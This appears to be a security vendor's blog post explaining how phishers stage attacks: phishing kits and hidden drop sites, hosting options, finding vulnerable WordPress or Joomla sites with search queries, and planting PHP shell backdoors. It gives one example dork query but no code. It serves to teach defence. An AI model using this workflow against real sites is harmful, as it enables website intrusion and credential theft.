At its highest level, the phishing process consists of staging an attack, launching it, collecting stolen credentials, and monetizing them. Today’s phishers use a range of tools to carry out their attacks. These tools are available for free or may be purchased in underground markets. More advanced phishers may build their own tools and incorporate layers of automation that further reduce the effort and costs required from start to finish.
Today's post focuses on staging a phishing attack. To stage a phishing attack, fraudsters need two basic things:
- A website where the phish site can be hosted.
Phishing kits are pre-packaged sets of the files needed to make a phish site. They are typically packaged in a compressed archive format such as .zip, .rar, or .tgz. Phishing kits are posted for sale, or for free download, on a wide range of online cybercrime forums, kit distribution sites and IRC channels.
Phishing kits are usually configured to send stolen information to “drop site” email addresses or to save the data to a file on the webserver in which the phish site is hosted. To prevent drop sites from being easily found, phishing kits may obfuscate the email addresses in the code. Some phish kit authors place hidden drop sites in the kits they sell or give away – allowing them to secretly harvest information stolen by other fraudsters.
Hosting phishing sites
Before launching an attack, phishers must find a place to host their phishing site. Phishers have a few basic options for this:
- Hack a vulnerable website
- Use a free hosting service
- Purchase illegitimate hosting services (“Bulletproof” hosting for example)
- Pay for legitimate hosting services
By far, most phishing sites are hosted on hacked websites:
Source: The Anti-Phishing Working Group
There is an abundance of websites using vulnerable deployments of popular CMS platforms like WordPress, Joomla and Drupal. These sites are also less likely to be on domains that are blacklisted by safe browsing technologies and end point security products.
Vulnerable websites can be easily found using specialized search queries (“Google dorks”) that look for sites with an exploitable weakness. For example, “inurl: wp-content/plugins/VULNERABLE PLUGIN” is a basic query that could be used by an attacker to find WordPress sites with a plugin that has exploitable vulnerabilities.
Cybercriminals also use bots to scan the Web for vulnerable sites. Scanner bots are frequently used to find websites with Remote or Local File Inclusion (RFI/LFI) vulnerabilities, a common flaw found in PHP code that allows an attacker to input and execute malicious code.
When a vulnerable website is found, phishers exploit the vulnerability to install a backdoor (often a PHP shell). From there, they upload their phishing kit and the phish site is now live.
To learn more about how phishing attacks work and how to stop them, check out the "How to Fight Back against Phishing" white paper.